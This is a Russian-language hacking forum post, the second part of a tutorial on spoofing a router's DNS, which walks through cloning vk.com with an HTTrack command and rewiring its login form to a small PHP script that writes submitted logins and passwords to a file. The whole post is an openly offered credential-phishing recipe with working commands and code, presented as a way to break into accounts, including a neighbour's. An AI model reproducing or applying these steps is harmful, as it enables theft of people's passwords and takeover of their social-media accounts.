Подмена DNS роутера. Граббинг сайта и получение доступов.

AnGel

Администратор
Команда форума
27 Авг 2015
3,266
1,871
113
Всем Салам и Доброй ночи. Люблю сидеть ночью и писать статьи, вообще такое желание возникла в далеком 2012 году, когда еще учился в школе, создал компьютерный блог и писал много статей и в то время блог был достаточно популярным в этой тематике. И теперь вот ночью включаю какую-то комедию и начинаю писать. Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.

Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.

[0] – Немного теории. Что у нас есть?

Итак, давайте подробнее. Какими будут наши шаги:

1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
1.jpg

2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.

На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.


[1] – Практика.

[1.1] – Граббинг сайта.

Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:

[SRC]httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"[/SRC]

ут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:
upload_2018-1-6_0-8-8.png

upload_2018-8-19_1-16-35.png

Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.

[1.2] - Получаем доступы к аккаунту

Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
В домашней директории создадим файл handler.php с содержимым:

[SRC]$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);[/SRC]

А на главной странице фейка, в параметр action подставим handler.php
upload_2018-1-6_1-4-23.png

Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле.

upload_2018-1-6_1-7-40.png

Вуаля, таким образом мы можем вернуть наш взломанный аккаунт, соседом.